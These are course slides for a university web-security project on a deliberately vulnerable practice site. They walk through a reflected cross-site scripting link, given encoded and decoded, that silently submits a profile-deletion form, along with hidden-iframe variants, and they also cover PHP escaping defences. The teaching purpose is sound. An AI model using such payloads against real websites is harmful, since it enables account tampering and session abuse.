Spring 2007 CS 155 Project 2: Web App Security Collin Jackson
Part 1 Attacks
Overview
• Explore several attack types
• Requires both effectiveness and stealth
• Learn:
  • How an attacker can evade sanitization
  • Consequences of an exploit
  • JavaScript
  • Very basic CSS
Attacks
• A: Cookie Theft
  • Use URL encoding
  • Could hijack session
• B: Request Forgery
  • Navigate browser
  • Use iframes, forms
• C: Password Theft
  • Evade sanitization
  • Handle DOM events
• D: Profile Worm
  • Persistent attack
  • Replicates
[Diagram: attack flows (form, link, email, redirect) between zoobar.org, badguy.com and stanford.edu]
Sanitization
• Works differently depending on context
• <tag property=" attackstring ">
  • Attack: Break out with ' "
  • Defense: escape quotes with \
• <body> attackstring </body>
  • Attack: Launch script with < >
  • Attack: Close off parent tag </tag>
  • Defense: escape angle brackets
• eval( attackstring )
  • Attack: Do whatever you want
  • Defense: Don't do that
Example: Profile Deleter
• Malicious hyperlink deletes profile of user who clicks it
• Only works when user logged in
  • User might have multiple tabs open
  • Might have chosen not to log out, or forgotten to
  • Might appear in another user's profile
• Uses vulnerability in users.php from Attack A
• Constructs profile deletion form and submits it
Find vulnerability
• Site reflects query parameter in input field
• Link can include anything we want here
Copy form data
• View source to find form fields
• Create copycat form with our modifications
URL encode
• http://scriptasylum.com/tutorials/encdec/encode-decode.html
• http://www.dommermuth-1.com/protosite/experiments/encode/index.html
• Close previous <input>, <form>
• Button click triggers form submit
Debugging
• It didn't work. Open JavaScript console
• Check error: "Undefined", "No properties!"
• Two forms with same name
Fixed version
• Now with correct form
Final Test
• http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
• Decoded value of the user parameter:
    "></form><form method="POST" name=profileform
      action="/index.php">
    <textarea name="profile_update"></textarea><br/>
    <input type=submit name="profile_submit" value="Save Profile"></form>
    <script>document.forms[1].profile_submit.click()</script>
• users.php replaced with index.php
• Profile deleted
Stealthier approaches
• Post form into hidden iframe
    <form name=F action=/index.php target=myframe>…
    <iframe name=myframe style="visibility:hidden">…
• Open page with form in hidden iframe
    <iframe name=myframe style="visibility:hidden">…
    <script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>
Part 2 Defenses
Goals
• Learn:
  • How easy it is to make mistakes
  • That even simple code can be hard to secure
  • Techniques for appropriate input validation
  • PHP
  • Very basic SQL
• A little programming knowledge can be a dangerous thing
File structure
• index.php
• users.php
• transfer.php
• login.php
• includes/
  • auth.php (cookie authentication)
  • common.php (includes everything else)
  • navigation.php (site template)
• db/
  • zoobar/
    • Person.txt (must be writable by web server)
• Includes /usr/class/cs155/projects/pp2/txt-db-api/…
• Only edit these files
txt-db-api
• Third-party text file database library
• Data can be int, string, and autoincrement
• Need to escape strings: \' \" \\
• Actually magic_quotes_gpc does this for us

    $recipient = $_POST['recipient'];   // already escaped by magic_quotes_gpc
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
    if ($rs->next())
        $id = $rs->getCurrentValueByName('PersonID');
Defenses to Part 1
• A: Cookie Theft
• B: Request Forgery
• C: Password Theft
• D: Profile Worm
PHP Sanitization Techniques
• addslashes(string)
  • Prepends backslash to ' " \
  • Already done by magic_quotes_gpc
  • Inverse: stripslashes(string)
• htmlspecialchars(string [, quote_style])
  • Converts & < > " to HTML entities
  • Use ENT_QUOTES to also convert ' to &#039;
• strip_tags(string [, allowable_tags])
  • Max tag length 1024
  • Does not sanitize tag properties
• preg_replace(pattern, replacement, subject)
• More info: http://php.net
More XSS hunting
• Look for untrusted input used as output
• Note sanitization already applied to each variable
  • Form data has magic_quotes_gpc, db data does not
• Sanitize the output if necessary
  • No penalty for erring on the side of caution
  • But sanitizing multiple times may lead to problems
• No credit for solving non-goals: SQL injection, etc.
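As an added example (not code from the CS 155 handout or the Zoobar project), the PHP below contrasts three ways users.php could reflect its query parameter into the input field from Attack A: unescaped, with only the backslashes magic_quotes_gpc supplies, and with htmlspecialchars(..., ENT_QUOTES) as the sanitization slides recommend. The parameter name "user", the attribute layout and the magic_quotes flag are assumptions.

```php
<?php
// Added example, not part of the CS 155 handout: context-aware output
// escaping for the users.php reflection exploited in Attack A. The
// parameter name "user" and the attribute layout are assumptions.

// Vulnerable: the query parameter is reflected straight into a quoted
// attribute, so a value starting with "> closes it and the <input> tag.
function render_user_field_vulnerable($user) {
    return '<input type="text" name="user" value="' . $user . '">';
}

// What magic_quotes_gpc / addslashes leaves you with. Backslashes mean
// nothing to an HTML parser: \" still ends the attribute value.
function render_user_field_slashes($user) {
    return '<input type="text" name="user" value="' . addslashes($user) . '">';
}

// Correct for this context: undo the magic_quotes backslashes (form data
// arrives with them on this setup; skip this if they are off, or you
// will eat legitimate backslashes), then HTML-escape. ENT_QUOTES also
// encodes single quotes, so this stays safe in a single-quoted attribute.
function render_user_field_safe($user, $magic_quotes_on = true) {
    $raw = $magic_quotes_on ? stripslashes($user) : $user;
    return '<input type="text" name="user" value="'
         . htmlspecialchars($raw, ENT_QUOTES) . '">';
}

// Constructed input: the opening of the Profile Deleter payload, as it
// would arrive from $_GET with magic_quotes_gpc on.
$payload = addslashes('"></form><form method="POST" name=profileform action="/index.php">');

foreach (array('vulnerable', 'slashes', 'safe') as $variant) {
    $html = call_user_func("render_user_field_$variant", $payload);
    // A literal <form tag in the output means the attribute was escaped.
    $broken = strpos($html, '<form') !== false;
    printf("%-10s %s\n", $variant, $broken ? 'BREAKS OUT' : 'safe');
    echo "  $html\n";
}
```

Only the third variant keeps the payload inside the attribute; the first two both emit a second <form> tag, which is exactly what the Profile Deleter relies on.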